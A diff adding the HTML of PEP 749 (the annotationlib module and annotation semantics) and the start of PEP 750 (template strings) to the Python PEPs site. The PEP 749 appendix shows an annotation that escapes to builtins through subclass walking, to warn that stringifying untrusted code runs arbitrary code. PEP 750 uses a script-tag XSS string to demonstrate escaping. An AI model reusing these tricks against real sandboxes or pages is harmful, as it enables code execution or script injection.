PEP 649 indicates that typing.ForwardRef should be used to implement the +FORWARDREF format in inspect.get_annotations(). However, the existing implementation +of typing.ForwardRef is intertwined with the rest of the typing module, +and it would not make sense to add typing-specific behavior to the generic get_annotations() +function. Furthermore, typing.ForwardRef is a problematic +class: it is public and documented, but the documentation lists no attributes or methods +for it. Nonetheless, third-party libraries make use of some of its undocumented +attributes. For instance, Pydantic +and Typeguard +use the _evaluate method; beartype +and pyanalyze +use the __forward_arg__ attribute.

+

We replace the existing but poorly specified typing.ForwardRef with a new class, +annotationlib.ForwardRef. It is designed to be mostly compatible with existing uses +of the typing.ForwardRef class, but without the behaviors specific to the +typing module. For compatibility with existing users, we keep the private +_evaluate method, but mark it as deprecated. It delegates to a new public function in +the typing module, typing.evaluate_forward_ref, that is designed to +evaluate forward references in a way that is specific to type hints.

+

We add a function annotationlib.call_annotate_function as a helper for calling +__annotate__ functions. This is a useful building block when implementing functionality +that needs to partially evaluate annotations while a class is being constructed. +For example, the implementation of typing.NamedTuple needs to retrieve +the annotations from a class namespace dictionary before the namedtuple class itself +can be constructed, because the annotations determine what fields exist on the namedtuple.

+
+
+

Specification

+

A new module, annotationlib, is added to the standard library. Its aim is to +provide tooling for introspecting and wrapping annotations.

+

The exact contents of the module are not yet specified. We will add support for +PEP 649 semantics to standard library functionality that uses annotations, such +as dataclasses and typing.TypedDict, and use the experience +to inform the design of the new module.

+

The module will contain the following functionality:

+
    +
  • get_annotations(): A function that returns the annotations of a function, +module, or class. This will replace inspect.get_annotations(). The latter +will delegate to the new function. It may eventually be deprecated, but to +minimize disruption, we do not propose an immediate deprecation.
  • +
  • get_annotate_function(): A function that returns the __annotate__ function +of an object, if it has one, or None if it does not. This is usually equivalent +to accessing the .__annotate__ attribute, except in the presence of metaclasses +(see below).
  • +
  • Format: an enum that contains the possible formats of annotations. This will +replace the VALUE, FORWARDREF, and SOURCE formats in PEP 649. +PEP 649 proposed to make these values global members of the inspect +module; we prefer to place them within an enum. We propose to add a fourth format, +VALUE_WITH_FAKE_GLOBALS (see below).
  • +
  • ForwardRef: a class representing a forward reference; it may be returned by +get_annotations() when the format is FORWARDREF. The existing class +typing.ForwardRef will become an alias of this class. Its members include:
      +
    • __forward_arg__: the string argument of the forward reference
    • +
    • evaluate(globals=None, locals=None, type_params=None, owner=None): a method that attempts to evaluate +the forward reference. The ForwardRef object may hold a reference to the +globals and other namespaces of the object that it originated from. If so, these +namespaces may be used to evaluate the forward reference. The owner argument +may be the object that holds the original annotation, such as the class or module +object; it is used to extract the globals and locals namespaces if these are not +provided.
    • +
    • _evaluate(), with the same interface as the existing ForwardRef._evaluate +method. It will be undocumented and immediately deprecated. It is provided for +compatibility with existing users of typing.ForwardRef.
    • +
    +
  • +
  • call_annotate_function(func: Callable, format: Format): a helper for calling +an __annotate__ function with a given format. If the function does not support +this format, call_annotate_function() will set up a “fake globals” environment, +as described in PEP 649, and use that environment to return the desired annotations +format.
  • +
  • call_evaluate_function(func: Callable | None, format: Format): similar to +call_annotate_function, but does not rely on the function returning an annotations +dictionary. This is intended to be used for evaluating deferred attributes introduced by +PEP 695 and PEP 696; see below for details. func may be None +for convenience; if None is passed, the function also returns None.
  • +
  • annotations_to_string(annotations: dict[str, object]) -> dict[str, str]: a function that +converts each value in an annotations dictionary to a string representation. +This is useful for +implementing the SOURCE format in cases where the original source is not available, +such as in the functional syntax for typing.TypedDict.
  • +
  • value_to_string(value: object) -> str: a function that converts a single value to a +string representation. This is used by annotations_to_string. +It uses repr() for most values, but for types it returns the fully qualified name. +It is also useful as a helper for the repr() of a number of objects in the +typing and collections.abc modules.
  • +
+

A new function is also added to the typing module, typing.evaluate_forward_ref. +This function is a wrapper around the ForwardRef.evaluate method, but it performs +additional work that is specific to type hints. For example, it recurses into complex +types and evaluates additional forward references within these types.

+

Contrary to PEP 649, the annotation formats (VALUE, FORWARDREF, and SOURCE) +will not be added as global members of the inspect module. The only recommended +way to refer to these constants will be as annotationlib.Format.VALUE.

+
+
+

Open issues

+

What should this module be called? Some ideas:

+
    +
  • annotations: The most obvious name, but it may cause confusion with the existing +from __future__ import annotations, because users may have both import annotations +and from __future__ import annotations in the same module. The use of a common word +as the name will make the module harder to search for. There is a PyPI package annotations, +but it had only a single release in 2015 and looks abandoned.
  • +
  • annotation (in the singular): Similar, but does not cause confusion with the future +import. There is an abandoned PyPI package annotation, but it apparently never +released any artifacts.
  • +
  • annotools: Analogous to itertools and functools, but “anno” is a less +obvious abbreviation than “iter” or “func”. As of this writing, there +is no PyPI package with this name.
  • +
  • annotationtools: A more explicit version. There is a PyPI package +annotationtools, which had a release in 2023.
  • +
  • annotation_tools: A variation of the above but without a PyPI conflict. However, +no other public standard library module has an underscore in its name.
  • +
  • annotationslib: Analogous to tomllib, pathlib, and importlib. +There is no PyPI package with this name.
  • +
  • annotationlib: Similar to the above, but one character shorter and subjectively reads +better. Also not taken on PyPI.
  • +
+
+
+

Rejected alternatives

+

Add the functionality to the inspect module: As described above, the +inspect module is already quite large, and its import time is prohibitive +for some use cases.

+

Add the functionality to the typing module: While annotations are mostly +used for typing, they may also be used for other purposes. We prefer to keep a clean +separation between functionality for introspecting annotations and functionality that +is exclusively meant for type hints.

+

Add the functionality to the types module: The types module is +meant for functionality related to types, and annotations can exist on functions +and modules, not only on types.

+

Develop this functionality in a third-party package: The functionality in this new +module will be pure Python code, and it is possible to implement a third-party package +that provides the same functionality by interacting directly with __annotate__ +functions generated by the interpreter. However, the functionality of the proposed new +module will certainly be useful in the standard library itself (e.g., for implementing +dataclasses and typing.NamedTuple), so it makes sense to include +it in the standard library.

+

Add this functionality to a private module: It would be possible to initially develop +the module in a private standard library module (e.g., _annotations), and publicize +it only after we have gained more experience with the API. However, we already know +that we will need parts of this module for the standard library itself (e.g., for +implementing dataclasses and typing.NamedTuple). Even if we make +it private, the module will inevitably get used by third-party users. It is preferable +to start with a clear, documented API from the beginning, to enable third-party users to +support PEP 649 semantics as thoroughly as the standard library. The module will +immediately be used in other parts of the standard library, ensuring that it covers a +reasonable set of use cases.

+
+
+
+

Behavior of the REPL

+

PEP 649 specifies the following behavior of the interactive REPL:

+
+
For the sake of simplicity, in this case we forego delayed evaluation. +Module-level annotations in the REPL shell will continue to work exactly +as they do with “stock semantics”, evaluating immediately and setting the +result directly inside the __annotations__ dict.
+

There are several problems with this proposed behavior. It makes the REPL the +only context where annotations are still evaluated immediately, which is +confusing for users and complicates the language.

+

It also makes the implementation of the REPL more complex, as it needs to +ensure that all statements are compiled in “interactive” mode, even if their +output does not need to be displayed. (This matters when the REPL evaluates +multiple statements on a single line.)

+

Most importantly, this breaks some plausible use cases that inexperienced +users could run into. A user might write the following in a file:

+
a: X | None = None
+class X: ...
+
+
+

Under PEP 649 this would work fine: X is not yet defined when it is used +in the annotation for a, but the annotation is lazily evaluated. However, +if a user were to paste this same code into the REPL and execute it line by +line, it would raise a NameError, because the name X is not yet defined.

+

This topic was previously discussed on Discourse.

+
+

Specification

+

We propose to treat the interactive console like any other module-level code, and +make annotations lazily evaluated. This makes the language more consistent and +avoids subtle behavior changes between modules and the REPL.

+

Because the REPL is evaluated line by line, we would generate a new __annotate__ +function for every evaluated statement in the global scope that contains annotations. Whenever a line +containing annotations is evaluated, the previous __annotate__ function is +lost:

+
>>> x: int
+>>> __annotate__(1)
+{'x': <class 'int'>}
+>>> y: str
+>>> __annotate__(1)
+{'y': <class 'str'>}
+>>> z: doesntexist
+>>> __annotate__(1)
+Traceback (most recent call last):
+File "<python-input-5>", line 1, in <module>
+    __annotate__(1)
+    ~~~~~~~~~~~~^^^
+File "<python-input-4>", line 1, in __annotate__
+    z: doesntexist
+       ^^^^^^^^^^^
+NameError: name 'doesntexist' is not defined
+
+
+

There will be no __annotations__ key in the global namespace of the REPL. +In module namespaces, this key is created lazily when the __annotations__ +descriptor of the module object is accessed, but in the REPL there is no such module +object.

+

Classes and functions defined within the REPL will also work like any other classes, +so evaluation of their annotations will be deferred. It is possible to access the +__annotations__ and __annotate__ attributes or use the annotationlib module +to introspect the annotations.

+
+
+
+

Wrappers that provide __annotations__

+

Several objects in the standard library and elsewhere provide annotations for their +wrapped object. PEP 649 does not specify how such wrappers should behave.

+
+

Specification

+

Wrappers that provide annotations should be designed with the following goals +in mind:

+
    +
  • Evaluation of __annotations__ should be deferred for as long as possible, +consistent with the behavior of built-in functions, classes, and modules.
  • +
  • Backward compatibility with the behavior prior to the implementation of PEP 649 +should be preserved.
  • +
  • The __annotate__ and __annotations__ attributes should both be supplied +with semantics consistent to those of the wrapped object.
  • +
+

More specifically:

+
    +
  • functools.update_wrapper() (and therefore functools.wraps()) +will copy only the __annotate__ attribute +from the wrapped object to the wrapper. The __annotations__ descriptor on the +wrapper function will use the copied __annotate__ (see the sketch after this list).
  • +
  • The constructors for classmethod() and staticmethod() currently +copy the __annotations__ attribute from the wrapped object to the wrapper. +They will instead have writable attributes for +__annotate__ and __annotations__. Reading these attributes will retrieve +the corresponding attribute from the underlying callable and cache it in the wrapper’s +__dict__. Writing to these attributes will directly update the __dict__, +without affecting the wrapped callable.
  • +
+
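The following sketch illustrates the intended behavior of functools.wraps() under these rules; pass_through and Later are hypothetical names:

import functools

def pass_through(func):
    @functools.wraps(func)  # copies __annotate__, so evaluation stays deferred
    def wrapper(*args, **kwargs):
        return func(*args, **kwargs)
    return wrapper

@pass_through
def f(x: Later): ...  # fine, even though Later is not defined yet

class Later: ...

f.__annotations__  # {'x': <class 'Later'>}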
+
+
+

Annotations and metaclasses

+

Testing of the initial implementation of this PEP revealed serious problems with +the interaction between metaclasses and class annotations.

+
+

Pre-existing bugs

+

We found several bugs in the existing behavior of __annotations__ on classes +while investigating the behaviors to be specified in this PEP. Fixing these bugs +on Python 3.13 and earlier is outside the scope of this PEP, but they are noted here +to explain the corner cases that need to be dealt with.

+

For context, on Python 3.10 through 3.13 the __annotations__ dictionary is +placed in the class namespace if the class has any annotations. If it does not, +there is no __annotations__ class dictionary key when the class is created, +but accessing cls.__annotations__ invokes a descriptor defined on type +that returns an empty dictionary and stores it in the class dictionary. +Static types are an exception: they never have +annotations, and accessing .__annotations__ raises AttributeError. +On Python 3.9 and earlier, the behavior was different; see +gh-88067.

+

The following code fails identically on Python 3.10 through 3.13:

+
class Meta(type): pass
+
+class X(metaclass=Meta):
+    a: str
+
+class Y(X): pass
+
+Meta.__annotations__  # important
+assert Y.__annotations__ == {}, Y.__annotations__  # fails: {'a': <class 'str'>}
+
+
+

If the annotations on the metaclass Meta are accessed before the annotations +on Y, then the annotations for the base class X are leaked to Y. +However, if the metaclass’s annotations are not accessed (i.e., the line Meta.__annotations__ +above is removed), then the annotations for Y are correctly empty.

+

Similarly, annotations from annotated metaclasses leak to unannotated +classes that are instances of the metaclass:

+
class Meta(type):
+    a: str
+
+class X(metaclass=Meta):
+    pass
+
+assert X.__annotations__ == {}, X.__annotations__  # fails: {'a': <class 'str'>}
+
+
+

The reason for these behaviors is that if the metaclass contains an +__annotations__ entry in its class dictionary, this prevents +instances of the metaclass from using the __annotations__ data descriptor +on the base type class. In the first case, accessing Meta.__annotations__ +sets Meta.__dict__["__annotations__"] = {} as a side effect. Then, looking +up the __annotations__ attribute on Y first sees the metaclass attribute, +but skips it because it is a data descriptor. Next, it looks in the class dictionaries +of the classes in its method resolution order (MRO), finds X.__annotations__, +and returns it. In the second example, there are no annotations +anywhere in the MRO, so type.__getattribute__ falls back to +returning the metaclass attribute.

+
+
+

Metaclass behavior with PEP 649

+

With PEP 649, the behavior of accessing the .__annotations__ attribute +on classes when metaclasses are involved becomes even more erratic, because now +__annotations__ is only lazily added to the class dictionary even for classes +with annotations. The new __annotate__ attribute is also lazily created +on classes without annotations, which causes further misbehaviors when +metaclasses are involved.

+

The cause of these problems is that we set the __annotate__ and __annotations__ +class dictionary entries only under some circumstances, and rely on descriptors +defined on type to fill them in if they are not set. When normal +attribute lookup is used, this approach breaks down in the presence of +metaclasses, because entries in the metaclass’s own class dictionary can render +the descriptors invisible.

+

While we considered several approaches that would allow cls.__annotations__ +and cls.__annotate__ to work reliably when cls is a type with a custom +metaclass, any such approach would expose significant complexity to advanced users. +Instead, we recommend a simpler approach that confines the complexity to the +annotationlib module: in annotationlib.get_annotations, we bypass normal +attribute lookup by using the type.__annotations__ descriptor directly.

+
+
+

Specification

+

Users should always use annotationlib.get_annotations to access the +annotations of a class object, and annotationlib.get_annotate_function +to access the __annotate__ function. These functions will return only +the class’s own annotations, even when metaclasses are involved.

+

The behavior of accessing the __annotations__ and __annotate__ +attributes on classes with a metaclass other than builtins.type is +unspecified. The documentation should warn against direct use of these +attributes and recommend using the annotationlib module instead.

+

Similarly, the presence of __annotations__ and __annotate__ keys +in the class dictionary is an implementation detail and should not be relied +upon.

+
+
+

Rejected alternatives

+

We considered two broad approaches for dealing with the behavior +of the __annotations__ and __annotate__ entries in classes:

+
    +
  • Ensure that the entry is always present in the class dictionary, even if it +is empty or has not yet been evaluated. This means we do not have to rely on +the descriptors defined on type to fill in the field, and +therefore the metaclass’s attributes will not interfere. (Prototype +in gh-120719.)
  • +
  • Ensure that the entry is never present in the class dictionary, or at least +never added by logic in the language core. This means that the descriptors +on type will always be used, without interference from the metaclass. +(Prototype in gh-120816.)
  • +
+

Alex Waygood suggested an implementation using the first approach. When a +heap type (such as a class created through the class statement) is created, +cls.__dict__["__annotations__"] is set to a special descriptor. +On __get__, the descriptor evaluates the annotations by calling __annotate__ +and returning the result. The annotations dictionary is cached within the +descriptor instance. The descriptor also behaves like a mapping, +so that code that uses cls.__dict__["__annotations__"] will still usually +work: treating the object as a mapping will evaluate the annotations and behave +as if the descriptor itself was the annotations dictionary. (Code that assumes +that cls.__dict__["__annotations__"] is specifically an instance of dict +may break, however.)

+

This approach is also straightforward to implement for __annotate__: this +attribute is already always set for classes with annotations, and we can set +it explicitly to None for classes without annotations.

+

While this approach would fix the known edge cases with metaclasses, it +introduces significant complexity to all classes, including a new built-in type +(for the annotations descriptor) with unusual behavior.

+

The alternative approach would be to never set __dict__["__annotations__"] +and use some other storage to store the cached annotations. This behavior +change would have to apply even to classes defined under +from __future__ import annotations, because otherwise there could be buggy +behavior if a class is defined without from __future__ import annotations +but its metaclass does have the future enabled. As PEP 649 previously noted, +removing __annotations__ from class dictionaries also has backwards compatibility +implications: cls.__dict__.get("__annotations__") is a common idiom to +retrieve annotations.

+

This approach would also mean that accessing .__annotations__ on an instance +of an annotated class no longer works. While this behavior is not documented, +it is a long-standing feature of Python and is relied upon by some users.

+
+
+
+

Adding the VALUE_WITH_FAKE_GLOBALS format

+

PEP 649 specifies:

+
+
This PEP assumes that +third-party libraries may implement their own __annotate__ +methods, and those functions would almost certainly work +incorrectly when run in this “fake globals” environment. +For that reason, this PEP allocates a flag on code objects, +one of the unused bits in co_flags, to mean “This code +object can be run in a ‘fake globals’ environment.” This +makes the “fake globals” environment strictly opt-in, and +it’s expected that only __annotate__ methods generated +by the Python compiler will set it.
+

However, this mechanism couples the implementation with +low-level details of the code object. The code object flags are +CPython-specific and the documentation explicitly warns +against relying on the values.

+

Larry Hastings suggested an alternative approach that does not +rely on code flags: a fourth format, VALUE_WITH_FAKE_GLOBALS. +Compiler-generated annotate functions would support only the +VALUE and VALUE_WITH_FAKE_GLOBALS formats, both of which are +implemented identically. The standard library would use the +VALUE_WITH_FAKE_GLOBALS format when invoking an annotate function +in one of the special “fake globals” environments.

+

This approach is useful as a forward-compatible mechanism for +adding new annotation formats in the future. Users who manually +write annotate functions should raise NotImplementedError if +the VALUE_WITH_FAKE_GLOBALS format is requested, so the standard +library will not call the manually written annotate function with +“fake globals”, which could have unpredictable results.

+
+

Specification

+

An additional format, VALUE_WITH_FAKE_GLOBALS, is added to the Format enum in the +annotationlib module, with value equal to 2. (As a result, the values of the +other formats will shift relative to PEP 649: FORWARDREF will be 3 and SOURCE +will be 4.)

+

Compiler-generated +annotate functions will support this format and return the same value as +they would return for the VALUE format. The standard library will pass +this format to the __annotate__ function when it is called in a “fake globals” +environment, as used to implement the FORWARDREF and SOURCE formats. +All public functions in the annotationlib module that accept a format +argument will raise NotImplementedError if the format is VALUE_WITH_FAKE_GLOBALS.

+

Third-party code that implements __annotate__ functions should raise +NotImplementedError if the VALUE_WITH_FAKE_GLOBALS format is passed +and the function is not prepared to be run in a “fake globals” environment. +This should be mentioned in the data model documentation for __annotate__.

+
+
+
+

Effect of deleting __annotations__

+

PEP 649 specifies:

+
+
Setting o.__annotations__ to a legal value +automatically sets o.__annotate__ to None.
+

However, the PEP does not say what happens if the __annotations__ attribute +is deleted (using del). It seems most consistent that deleting the attribute +will also clear __annotate__.

+
+

Specification

+

Deleting the __annotations__ attribute on functions, modules, and classes +results in setting __annotate__ to None.
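Concretely:

def f(x: int): ...

del f.__annotations__
assert f.__annotate__ is None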

+
+
+
+

Deferred evaluation of PEP 695 and 696 objects

+

Since PEP 649 was written, Python 3.12 and 3.13 gained support for +several new features that also use deferred evaluation, similar to the +behavior this PEP proposes for annotations:

  • The value of type aliases created through the type statement (PEP 695)
  • The bound and constraints of TypeVar objects created through PEP 695 syntax
  • The default value of TypeVar, ParamSpec, and TypeVarTuple objects (PEP 696)

Currently, these objects use deferred evaluation, but there is no direct +access to the function object used for deferred evaluation. To enable +the same kind of introspection that is now possible for annotations, we propose +to expose the internal function objects, allowing users to evaluate them +using the FORWARDREF and SOURCE formats.

+
+

Specification

+

We will add the following new attributes:

  • evaluate_value on TypeAliasType (the value of a type alias)
  • evaluate_bound, evaluate_constraints, and evaluate_default on TypeVar
  • evaluate_default on ParamSpec
  • evaluate_default on TypeVarTuple

Except for evaluate_value, these attributes may be None if the object +does not have a bound, constraints, or default. Otherwise, the attribute is a +callable, similar to an __annotate__ function, that takes a single integer +argument and returns the evaluated value. Unlike __annotate__ functions, +these callables return a single value, not a dictionary of annotations. +These attributes are read-only.

+

Usually, users would use these attributes in combination with +annotationlib.call_evaluate_function. For example, to get a TypeVar’s bound +in SOURCE format, one could write +annotationlib.call_evaluate_function(T.evaluate_bound, annotationlib.Format.SOURCE).
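Spelled out as a sketch, with Bound as a deliberately undefined name:

from annotationlib import Format, call_evaluate_function

def f[T: Bound](): ...  # the bound is evaluated lazily

T = f.__type_params__[0]
call_evaluate_function(T.evaluate_bound, Format.SOURCE)  # 'Bound'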

+
+
+
+

Behavior of dataclass field types

+

One consequence of the deferred evaluation of annotations is that +dataclasses can use forward references in their annotations:

+
>>> from dataclasses import dataclass
+>>> @dataclass
+... class D:
+...     x: undefined
+...
+
+
+

However, the FORWARDREF format leaks into the field types of the dataclass:

+
>>> fields(D)[0].type
+ForwardRef('undefined')
+
+
+

We considered a change where the .type attribute of a field object would +trigger evaluation of annotations, so that the field type could contain actual +values in the case of forward references that were defined after the dataclass +itself was created, but before the field type is accessed. +However, this would also mean that accessing .type could now run arbitrary +code in the annotation, and potentially raise errors such as NameError.

+

Therefore, we consider it more user-friendly to keep the ForwardRef object +in the type, and document that users who want to resolve forward references +can use the ForwardRef.evaluate method.
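Continuing the example above, once the missing name exists the reference can be resolved. Whether evaluate() succeeds without explicitly passed namespaces depends on the namespaces the ForwardRef retained, so this is a sketch:

>>> from dataclasses import fields
>>> class undefined: ...
...
>>> fields(D)[0].type.evaluate()
<class '__main__.undefined'>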

+

If use cases come up in the future, we could add additional functionality, +such as a new method that re-evaluates the annotation from scratch.

+
+
+

Renaming SOURCE to STRING

+

The SOURCE format is meant for tools that need to show a human-readable +format that is close to the original source code. However, we cannot retrieve +the original source in __annotate__ functions, and in some cases, we have +__annotate__ functions in Python code that do not have access to the original +code. For example, this applies to dataclasses.make_dataclass() +and the call-based syntax for typing.TypedDict.

+

This makes the name SOURCE a bit of a misnomer. The goal of the format +should indeed be to recreate the source, but the name is likely to mislead +users in practice. A more neutral name would emphasize that the format returns +an annotation dictionary with only strings. We suggest STRING.

+
+

Specification

+

The SOURCE format is renamed to STRING. To reiterate the changes in this +PEP, the four supported formats are now:

+
    +
  • VALUE: the default format, which evaluates the annotations and returns the +resulting values.
  • +
  • VALUE_WITH_FAKE_GLOBALS: for internal use; should be handled like VALUE +by annotate functions that support execution with fake globals.
  • +
  • FORWARDREF: replaces undefined names with ForwardRef objects.
  • +
  • STRING: returns strings that attempt to recreate code close to the original source.
  • +
+
+
+
+

Miscellaneous implementation details

+

PEP 649 goes into considerable detail on some aspects of the implementation. +To avoid confusion, we describe a few aspects where the current implementation +differs from that described in the PEP. However, these details are not guaranteed +to hold, and they may change without notice in the future, unless +they are documented in the language reference.

+
+

Supported operations on ForwardRef objects

+

The SOURCE format is implemented by the “stringizer” technique, +where the globals dictionary of a function is augmented so that every +lookup results in a special object that can be used to reconstruct the +operations that are performed on the object.

+

PEP 649 specifies:

+
+
In practice, the “stringizer” functionality will be implemented +in the ForwardRef object currently defined in the +typing module. ForwardRef will be extended to +implement all stringizer functionality; it will also be +extended to support evaluating the string it contains, +to produce the real value (assuming all symbols referenced +are defined).
+

However, this is likely to lead to confusion in practice. An object +that implements stringizer functionality must implement almost all +special methods, including __getattr__ and __eq__, to return +a new stringizer. Such an object is confusing to work with: all operations +succeed, but they are likely to return different objects than the user +expects.

+

The current implementation instead implements only a few useful methods +on the ForwardRef class. During the evaluation of annotations, +an instance of a private stringizer class is used instead of ForwardRef. +After evaluation completes, the implementation of the FORWARDREF format +converts these internal objects into ForwardRef objects.

+
+
+

Signature of __annotate__ functions

+

PEP 649 specifies the signature of __annotate__ functions as:

+
+
__annotate__(format: int) -> dict
+

However, using format as a parameter name could lead to collisions +if an annotation uses a symbol named format. To avoid this problem, the +parameter should be positional-only and have a name that is not a legal +identifier.
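To illustrate the collision, consider a module-level name format used in an annotation; a compiler-generated annotate function with a plain parameter name (shown here schematically, not as the real implementation) would shadow it:

format = str  # a global that collides with the parameter name

def f(x: format): ...

# Roughly what the compiler would generate with a plain parameter name:
def __annotate__(format):
    return {"x": format}  # wrong: returns the format argument, not the global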

+

The current implementation uses the name .format with a leading +dot, but the exact name should be considered an implementation detail +and cannot be relied upon.

+

The documentation may still use the name format for simplicity.

+
+
+
+

Backwards Compatibility

+

PEP 649 provides a thorough discussion of the backwards compatibility implications +on existing code that uses either stock or PEP 563 semantics.

+

However, there is another set of compatibility problems: new code that is written +assuming PEP 649 semantics, but uses existing tools that eagerly evaluate annotations. +For example, consider a dataclass-like class decorator @annotator that retrieves the annotated +fields in the class it decorates, either by accessing __annotations__ directly +or by calling inspect.get_annotations().

+

Once PEP 649 is implemented, code like this will work fine:

+
class X:
+    y: Y
+
+class Y: pass
+
+
+

But this will not, unless @annotator is changed to use the new FORWARDREF +format:

+
@annotator
+class X:
+    y: Y
+
+class Y: pass
+
+
+

This is not strictly a backwards compatibility issue, since no previously working code +would break; before PEP 649, this code would have raised NameError at runtime. +In a sense, it is no different from any other new Python feature that needs +to be supported by third-party libraries. Nevertheless, it is a serious issue for libraries +that perform introspection, and it is important that we make it as easy as possible for +libraries to support the new semantics in a straightforward, user-friendly way.

+

We will update those parts of the standard library that are affected by this problem, +and we propose to add commonly useful functionality to the new annotationlib module, +so third-party tools can use the same set of tools.
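For instance, the hypothetical @annotator decorator above could opt into the new semantics with a sketch like this:

from annotationlib import Format, get_annotations

def annotator(cls):
    # FORWARDREF tolerates names that are not defined yet, returning
    # ForwardRef objects instead of raising NameError.
    annotations = get_annotations(cls, format=Format.FORWARDREF)
    ...  # process the annotated fields
    return cls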

+
+
+

Security Implications

+

None.

+
+
+

How to Teach This

+

The semantics of PEP 649, as modified by this PEP, should largely be intuitive for +users who add annotations to their code. We eliminate the need for manually adding +quotes around annotations that require forward references, a major source of confusion +for users.

+

For advanced users who need to introspect annotations, the story becomes more complex. +The documentation of the new annotationlib module will serve as a reference for users +who need to interact programmatically with annotations.

+
+
+

Reference Implementation

+

The in-progress PR #119891 +implements much of this PEP.

+
+
+

Open Issues

+

We may discover additional areas where PEP 649 needs clarification or amendment +as we make progress on implementing it. Readers are encouraged to follow the +CPython issue tracking the +implementation of the PEP and try out the draft implementation. Any feedback may +be incorporated into future versions of this PEP.

+
+
+

Acknowledgments

+

First of all, I thank Larry Hastings for writing PEP 649. This PEP modifies some of his +initial decisions, but the overall design is still his.

+

I thank Carl Meyer and Alex Waygood for feedback on early drafts of this PEP. Alex Waygood, +Alyssa Coghlan, and David Ellis provided insightful feedback and suggestions on the +interaction between metaclasses and __annotations__. Larry Hastings also provided useful +feedback on this PEP.

+
+
+

Appendix

+
+

Which expressions can be stringified?

+

PEP 649 acknowledges that the stringifier cannot handle all expressions. Now that we +have a draft implementation, we can be more precise about the expressions that can and +cannot be handled. Below is a list of all expressions in the Python AST that can and +cannot be recovered by the stringifier. The full list should probably not be added to +the documentation, but creating it is a useful exercise.

+

First, the stringifier of course cannot recover any information that is not present in +the compiled code, including comments, whitespace, parenthesization, and operations that +get simplified by the AST optimizer.

+

Second, the stringifier can intercept almost all operations that involve names looked +up in some scope, but it cannot intercept operations that operate fully on constants. +As a corollary, this also means it is not safe to request the SOURCE format on +untrusted code: Python is powerful enough that it is possible to achieve arbitrary +code execution even with no access to any globals or builtins. For example:

+
>>> def f(x: (1).__class__.__base__.__subclasses__()[-1].__init__.__builtins__["print"]("Hello world")): pass
+...
+>>> annotationlib.get_annotations(f, format=annotationlib.Format.SOURCE)
+Hello world
+{'x': 'None'}
+
+
+

(This particular example worked for me on the current implementation of a draft of this PEP; +the exact code may not keep working in the future.)

+

The following are supported (sometimes with caveats):

+
  • BinOp
  • UnaryOp
      • Invert (~), UAdd (+), and USub (-) are supported
      • Not (not) is not supported
  • Dict (except when using ** unpacking)
  • Set
  • Compare
      • Eq and NotEq are supported
      • Lt, LtE, Gt, and GtE are supported, but the operands may be flipped (see the sketch after this list)
      • Is, IsNot, In, and NotIn are not supported
  • Call (except when using ** unpacking)
  • Constant (though not the exact representation of the constant; for example, escape sequences in strings are lost; hexadecimal numbers are converted to decimal)
  • Attribute (assuming the value is not a constant)
  • Subscript (assuming the value is not a constant)
  • Starred (* unpacking)
  • Name
  • List
  • Tuple
  • Slice
+
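The flipped-operand caveat for comparisons arises because the stringifier works through the reflected dunder methods. A hedged sketch:

import annotationlib

def f(x: 10 < y): pass  # y is intentionally undefined at definition time

# int.__lt__ returns NotImplemented for the stringifier's name proxy, so
# Python falls back to the proxy's reflected __gt__, which records the
# proxy on the left-hand side:
print(annotationlib.get_annotations(f, format=annotationlib.Format.SOURCE))
# may print {'x': 'y > 10'} rather than the original '10 < y'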

The following are unsupported, but throw an informative error when encountered by the stringifier:

  • FormattedValue (f-strings; error is not detected if conversion specifiers like !r are used)
  • JoinedStr (f-strings)
+

The following are unsupported and result in incorrect output:

+
  • BoolOp (and and or)
  • IfExp
  • Lambda
  • ListComp
  • SetComp
  • DictComp
  • GeneratorExp
+

The following are disallowed in annotation scopes and therefore not relevant:

+
  • NamedExpr (:=)
  • Await
  • Yield
  • YieldFrom
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0749.rst

+

Last modified: 2024-09-26 18:55:45 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0750/index.html b/pep-0750/index.html
new file mode 100644
index 00000000000..09e7a93a382
--- /dev/null
+++ b/pep-0750/index.html
@@ -0,0 +1,1318 @@
+
+


+ + +
+
+
+

PEP 750 – Template Strings

+
+
Author:
+
Jim Baker <jim.baker at python.org>, +Guido van Rossum <guido at python.org>, +Paul Everitt <pauleveritt at me.com>, +Koudai Aono <koxudaxi at gmail.com>, +Lysandros Nikolaou <lisandrosnik at gmail.com>, +Dave Peck <davepeck at davepeck.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
08-Jul-2024
+
Python-Version:
+
3.14
+
Post-History:
+
09-Aug-2024, +17-Oct-2024, +21-Oct-2024
+
+
+
+
+
+

Abstract

+

This PEP introduces template strings for custom string processing.

+

Template strings are a generalization of f-strings, using a t in place of +the f prefix. Instead of evaluating to str, t-strings evaluate to a new +type, Template:

+
template: Template = t"Hello {name}"
+
+
+

Templates provide developers with access to the string and its interpolated +values before they are combined. This brings native flexible string +processing to the Python language and enables safety checks, web templating, +domain-specific languages, and more.

+
+
+

Relationship With Other PEPs

+

Python introduced f-strings in Python 3.6 with PEP 498. The grammar was +then formalized in PEP 701 which also lifted some restrictions. This PEP +is based on PEP 701.

+

At nearly the same time PEP 498 arrived, PEP 501 was written to provide “i-strings” – that is, “interpolation template strings”. That PEP was deferred pending further experience with f-strings. Work on it was resumed by a different author in March 2023, introducing “t-strings” as template literal strings built atop PEP 701.

+

The authors of this PEP consider it to be a generalization and simplification +of the updated work in PEP 501. (That PEP has also recently been updated to +reflect the new ideas in this PEP.)

+
+
+

Motivation

+

Python f-strings are easy to use and very popular. Over time, however, developers +have encountered limitations that make them +unsuitable for certain use cases. +In particular, f-strings provide no way to intercept and transform interpolated +values before they are combined into a final string.

+

As a result, incautious use of f-strings can lead to security vulnerabilities. +For example, a user executing a SQL query with sqlite3 +may be tempted to use an f-string to embed values into their SQL expression, +which could lead to a SQL injection attack. +Or, a developer building HTML may include unescaped user input in the string, +leading to a cross-site scripting (XSS) +vulnerability.

+

More broadly, the inability to transform interpolated values before they are +combined into a final string limits the utility of f-strings in more complex +string processing tasks.

+

Template strings address these problems by providing +developers with access to the string and its interpolated values.

+

For example, imagine we want to generate some HTML. Using template strings, +we can define an html() function that allows us to automatically sanitize +content:

+
evil = "<script>alert('evil')</script>"
+template = t"<p>{evil}</p>"
+assert html(template) == "<p>&lt;script&gt;alert('evil')&lt;/script&gt;</p>"
+
+
+

Likewise, our hypothetical html() function can make it easy for developers +to add attributes to HTML elements using a dictionary:

+
attributes = {"src": "shrubbery.jpg", "alt": "looks nice"}
